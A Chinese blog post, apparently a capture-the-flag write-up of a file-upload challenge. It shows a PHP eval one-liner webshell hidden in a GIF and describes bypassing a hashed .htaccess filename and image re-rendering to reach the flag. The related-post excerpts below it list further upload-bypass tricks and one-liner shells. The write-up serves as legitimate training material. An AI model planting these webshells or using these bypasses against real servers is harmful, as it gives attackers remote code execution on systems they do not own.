文件上传考核题解

已于 2022-05-01 15:16:36 修改
阅读量295 收藏
点赞数
文章标签: php 开发语言
于 2022-05-01 12:40:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63354940/article/details/124522169
版权

 展示靶场内容后看见有.htaccess,.flag.php文件,自然而然想到打开.htaccess文件,.flag.php为最后连接菜刀获得的文件,我们打开.htaccess后看见:

根据.htaccess知识点可知,如果上传该文件为所规定的文件名则会被当作php文件解析。(作者本人才开始打开该文件看见规定的名称时,并没有对此名称有过任何经过二次处理的怀疑,导致即使把图片马改为上述名字,文件保存后还是会存储在新的文件中,文件名更新,且图片马并未被当作php解析,经过同学指导得知改文件名进行过MD5加密,或百度是个好东西,将此加密后的文件名放入百度查询自动辨别MD5加密,解密为test.gif)

制作gif图片马(越小越好)

图片马

为防止被检测到,webshell可为:

<?
@eval($_POST['syy']);
?>

 上传图片马,保存为了指定文件名

 链接蚁剑发现返回数据为空,下载test.gif,发现php代码被消除==>二次渲染

将上传前后的图片进行对比,将一句话木马插入没有发生改变的地方

没有标黑的地放为没有被二次修改的地方,插入一句话木马(注意修改后文件名称依然要是test.gif,不然图片马不能被当作php解析)(作者在这儿犯了错误)

再次上传成功后链接蚁剑获取falg.php文件

syy️️
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
上传-试题
weixin_44584477的博客
06-09 760
上传试题 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 开发工具与关键技术:VS 作者:唐俊祥 撰写时间:2019.6.8 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ...
Hackinglab文件上传解题笔记
FunkyPants的博客
09-30 550
环境:Firefox浏览器+FireBug插件   1.      题目中要求上传一个jpg文件,但是如果你真的上传了一张jpg图片时…   可知,我们应该还是要上传一个php文件。 按F12可以看到,在前端有一个js脚本会对我们上传的文件类型进行验证。接下来,在安装了FireBug插件后,我们可以直接删除表单中触发js事件的onsubmit属性。 删除之前:   单击,删
文件上传题目练习
最新发布
cyy001128的博客
06-03 596
用法:把一句话木马压缩成zip格式,shell.php -> shell.zip,然后再上传到服务器(后续通过前端页面上传也没有问题,通常服务器不会限制上传 zip 文件),再访问:?因为Apache默认一个文件可以有多个用.分割得后缀,当最右边的后缀无法识别(mime.types文件中的为合法后缀)则继续向左看,直到碰到合法后缀才进行解析(以最后一个合法后缀为准),可用来绕过黑名单过滤。这里因为尝试了很多绕过方式都不成功,去搜索了一下wp,发现要用到Phar://伪协议。尝试蚁剑连接,返回为空。
文件上传的三道题
weixin_45782091的博客
04-16 1182
东哥说,不是期末周的时候就要抓紧时间提升自己的技术。 [ACTF2020 新生赛]Upload 1 随便传个图是可以进去的。 传一句话木马 发现被检测到了 检查网页时 发现了checkfile函数 删掉它
9 ,文件的上传与下载 ( 考题 )
孙砚秋的博客
06-02 359
1 ,lrzsz 这个软件是用来做什么的 :( ) 2 ,用 lrzsz 上传文件,方法是 ( ) 3 ,我的 linux 系统中有一个文件,名字是 aa.txt ,现在我想把它下载到 windows ,命令是 ( ) 参考答案 : 上传与下载 拖拽 sz aa.txt ...
文件上传练习 —— upload-labs靶场(二)
qq_45653588的博客
07-28 399
0X00 文件上传练习 —— upload-labs靶场(一) 0X01 Pass-8 第八关禁止上传所有可以解析的后缀 我们可以利用Windows系统的文件名特性。文件名最后增加点和空格,写成shell.php. ,上传后保存在Windows系统上的文件名最后的一个.会被去掉,实际上保存的文件名就是shell.php。 成功上传。 0X02 Pass-9 第九关又ban了一堆后缀名 查阅资料得知,这关可以利用Windows文件流特性绕过,文件名改成shell.php::$DATA,上传成功后保存的文
【PTE练习】文件上传upload-labs
leo788的博客
12-12 554
12题用的是GET方法,13题是POST方法,换汤不换药,但是在post中的截断不是在url中显示,因此其不需要url编码。其中,这里先执行首尾删除空格-删除末尾点-以点作为分隔-转换为小写-去除文件流-首尾删除空格,利用此在后缀处添加(点空格点)进行绕过,经过过滤后的后缀名带点,绕过黑名单php后缀。查看源码,其对文件类型进行判别,所以是MIME类型,将2.php上传后修改其类型为image/jpeg,转发包,成功。缺少空格,但是后缀中的空格会被系统删掉,所以通过抓包修改后缀名+空格。
[第二章 web进阶]文件上传]
DdddddXxxxx的博客
08-08 926
先看一下题目源码: <?php header("Content-Type:text/html; charset=utf-8"); // 每5分钟会清除一次目录下上传的文件 require_once('pclzip.lib.php'); if(!$_FILES){ echo ' <!DOCTYPE html> <html lang="zh"> <head> <meta charset="UTF-8" /> <
【CTF】文件上传(知识点+例题)(1)
qq_53099119的博客
03-23 5210
有的站点会出现仅进行了前端校验的情况(一切在前端做的安全防护,都是耍流氓),由于前端页面的源码是我们可以随意更改的,因此可以通过找到进行过滤的指令,更改成我们想要的功能即可。假设接下来就可以上传一个名为1.png的木马文件,植入后门,将其上传后,该文件虽文件后缀名为png,但会被当作php类型的文件进行解析,其中的一句话木马也能够被正常执行。因此,通过使用.user.ini,我们可以任意指定包含一个文件,这个文件可以是我们自己上传的木马文件,从而通过该木马文件提供后门来获取当前服务器的webshell。
i春秋-CTF-web文件上传
在Web和Reverse坑里游泳中。。。。
04-27 1738
前言 本来吧,悄悄摸鱼,想整点啥打发时间,看视频太明显,于是做做题,眉头紧锁,仔细思考,装作工作很难的样子。 这回选择web类型的题目,主要是好久没做了,手有点生,找个简单的文件上传练练。 打开题目环境发现: 好像是没有什么特别的。 但是往下翻看却是别有洞天。 众所周知,php是后端语言,正常情况下前端是看不到的,也就是说,出题人还是很贴心的(虽然我觉得出题人没那么好心)。 <?php header("Content-Type:text/html; charset=utf.
ctf文件上传基本思路+例题
limenzzz的博客
04-12 3824
目录 简介 一句话木马 蚁剑 例题 总结思路 附言 简介 文件上传本质上就是将文件传输到服务器时没有做好检测和过滤,导致可上传恶意程序到服务器,从而获得后台权限来干点坏事。一般这个恶意脚本文件称为webshell,通过webshell我们可以查看服务器的目录结构或文件,以及来执行一些系统指令。小马和大马,简单来说,大马是多功能,危害大,体积大的木马,小马是隐蔽性强,体量小,更方便的小木马。一句话木马就属于小马,所以较易突破防护,而大马极易被过滤。 一句话木马 首先通过看一些题解和博.
文件上传相关题目
m0_73952121的博客
10-21 1025
简单的文件上传题目
文件上传题型
我了解豹女就像农民伯伯了解大米
06-27 757
题目:通过你所学到的知识,测试其过WAF滤规则,突破上传获取webshell,答案就在根目录下key.php文件中。 先去上传1.php文件,里面编写一句话木马:<?php eval($_POST[c]);?> 通过抓包来获取内容,发现并没有上传成功 通过后缀名绕过上传:失败 通过内容头部绕过:成功 去访问上传的路径:http://192.168.129.128:82/vulnerabilities/1.phtml 使用蚁剑webshell进行连接:http:/..
文件上传+CTF题目
unexpectedthing的博客
10-27 2407
文章目录概念:文件上传绕过:1.绕过js代码:2.绕过服务端(MIME类型)3.绕过黑名单绕过白名单图片马文件上传后利用蚁剑进行连接后门 概念: web客户端在上传文件时,没有对上传文件的内容,扩展名等进行过滤。 文件上传绕过: 1.绕过js代码: (1)一般的web网页前端在上传文件时,都会利用js代码对文件的扩展名。也就是说,如果对文件的扩展名进行过滤了,可能是js代码的作用了。 (2)方法:利用火狐的about:config来禁用js代码执行。 先使用可以使用的扩展名进行上传,利用bp抓包,改数据包扩
CTF中文件上传题目整理总结
热门推荐
xiaotaode2012的专栏
08-16 1万+
0X00说在前面的话 CTF中或多或少都有点文件上传的题目,而这个又是最好整理的,变化的方式不是很多(至少到目前为止我没有发现太多的姿势。。。。),随意就先整理这个吧。 0x01文件上传绕过的主要姿势有: A:基于前台JS的验证,这个 不要说就是firebug下修改一下JS文件就绕过了 B:基于文件后缀名的绕过,这里面的主要姿势有:利用后缀名大小写混用绕过、空格或者
ctfshow-web入门 文件上传篇部分题解
volcano的博客
03-06 6603
ctfshow文件上传web151-152web153(.user.ini绕过).user.iniweb154-155(短标签绕过+.user.ini绕过)短标签绕过web156web157-159web160(日志包含绕过)web161web162-163(session文件包含+条件竞争)条件竞争web164(png图片二次渲染绕过)web165(jpg图片二次渲染绕过)web166web167(.htaccess) 文件上传 web151-152 这两题步骤是一样的,先写一个一句话: <?ph
框架设计--第十六章 文件上传和下载--习题答案
三桥君
02-21 5391
说明:框架设计(Spring)其他章节的习题答案也在此专栏 一、 填空题 由于不同版本的IE浏览器,请求代理【 User-Agent】中的关键字也略有不同。 ResponseEntity对象的作用有些类似于@ResponseBody注解,它用于直接返回【 结果对象】。 由于各个浏览器【内部转码机制 】的不同,就会出现不同的乱码以及解析异常问题。 使用Servlet API中提供的URLEnc...
CTF—文件上传练习
qq_45927819的博客
08-04 2394
Bugku_文件上传2 今天做题的时候发现了这道题尝试了好久才搞出来,记录一下! 方法一 一个欢迎界面 查看源码:在注释中看到了upload.php 访问upload.php: 只能上传jpg gif png格式的文件,且大小不能超过100kib 我们写一句话木马,改后缀为jpg格式: 上传成功了! 访问一下路径:发现php被解析掉了 换一个一句话木马:<script language="php">eval($_REQUEST[ABC])</script> 修改后缀为jpg
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

syy️️

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值